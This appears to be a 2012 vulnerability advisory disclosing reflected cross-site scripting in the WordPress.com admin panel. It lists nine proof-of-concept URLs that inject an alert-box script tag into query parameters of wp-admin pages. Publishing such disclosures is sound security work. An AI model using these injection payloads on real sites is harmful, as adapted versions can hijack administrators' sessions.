The administrative panel for WordPress Blog on WordPress.com suffers from a reflective cross site scripting vulnerability.
87662fc54e7b6298ff08f7317f1a8410dcbb4c6454b35404b18429d6ada48103
###############################################################################################################
# Exploit Title: Wordpress Blog ( hosted by Wordpress.com ) - Admin Panel Reflected Cross-Site Scripting ( XSS )
# Script Page : http://wordpress.com
# Date: 10-01-2012
# Author : RandomStorm - http://www.randomstorm.com
# Avram Marius Gabriel (d3v1l)
# Tested on: Windows XP & Vista (IE9)
###############################################################################################################
# Cross-Site Scripting (XSS)
# POC:
# http://site.com//wp-admin/index.php?page=my-comments&e3771"><script>alert(1)</script>9198e439b5b=1
# http://site.com//wp-admin/paid-upgrades.php?id=04a60d"><script>alert(1)</script>8b5efd72d71
# http://site.com/wp-admin/index.php?page=my-comments&e3771"><script>alert(1)</script>9198e439b5b=1
# http://site.com/wp-admin/edit.php?7ea9d"><script>alert(1)</script>4179dee262d=1
# http://site.com/wp-admin/post-new.php?cape7739"><script>alert(1)</script>154225169bf#cap
# http://site.com/wp-admin/tools.php?36eae"><script>alert(1)</script>3ee8cbf0807=1
# http://site.com/wp-admin/post.php?post=28ce53"><script>alert(1)</script>7d542a3eb0c&action=edit
# http://site.com/wp-admin/widgets.php?1a6e1"><script>alert(1)</script>fca8623d09b=1
# http://site.com/wp-admin/import.php?b90df"><script>alert(1)</script>4f0256c6187=1
################################################################################################################
# No version ! they use a dedicated script
# Works on Internet Explorer v9
################################################################################################################